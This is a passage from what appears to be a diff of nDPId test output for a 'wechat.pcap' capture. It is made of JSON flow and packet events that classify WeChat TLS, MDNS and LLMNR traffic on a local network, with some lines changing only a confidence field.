{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1492167788126,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167788126,"pkt":"AQBeAAD70CeIF3AECABFoABEPYcAAAER2HrAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1492167788128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167788128,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1492167789152,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167789152,"pkt":"AQBeAAD70CeIF3AECABFoABEPhsAAAER1+bAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1492167789153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167789153,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1492167789154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167789154,"pkt":"AQBeAAD70CeIF3AECABFoABEPiIAAAER19\/AqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1492167789157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167789157,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1492167795087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1492167795087,"pkt":"AQBeAAD80CeIF3AECABFoAA4QcoAAAER1ELAqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1492167795088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795088,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcsAAAER1EPAqAFk4AAA\/MKoFOsAIsj\/\/HMAAAABAAAAAAAACGNhbnNhcWNxAAABAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1492167795090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795090,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcwAAAER1ELAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1492167795091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1492167795091,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1492167795092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795092,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795092,"flow_last_seen":1492167795092,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795092,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1492167795095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795095,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxZEU6wAifoZEYgAAAAEAAAAAAAAIbWN6dG1wa2MAAAEAAQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1492167795096,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1492167795096,"pkt":"AQBeAAD80CeIF3AECABFoAA4Qc0AAAER1D\/AqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="} 